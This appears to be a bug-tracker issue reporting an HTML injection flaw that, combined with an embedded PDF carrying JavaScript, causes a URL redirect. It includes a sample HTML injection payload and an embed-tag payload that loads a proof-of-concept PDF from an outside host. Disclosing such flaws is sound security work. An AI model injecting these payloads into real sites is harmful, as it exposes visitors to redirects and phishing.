In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable

Question

In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable

Passer6y opened this issue 6 years ago · comments

In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable.

HTML injection
[HTML injection] (https://i.loli.net/2018/11/15/5bec54988cbe0.png)
payload :

<h1 style="color=red">xxx</h1>

Fix the vulnerability: please use html entity encode

PDF- Javascript- excute combined with html injection
poc:https://www.0u0.ooo/output.pdf

because of embed tags are not restricted by the same-origin policy, so we could upload my poc pdf file to our vps, and inject following code：

payload:<embed width="100%" height="100%" name="plugin" id="plugin"> src="https://www.0u0.ooo/output.pdf" type="application/pdf" internalinstanceid="5">
result:
1 img
2 img

Cube · Answer 1 · Mon Nov 19 2018 14:31:59 GMT+0800 (China Standard Time)

Duplicate of #127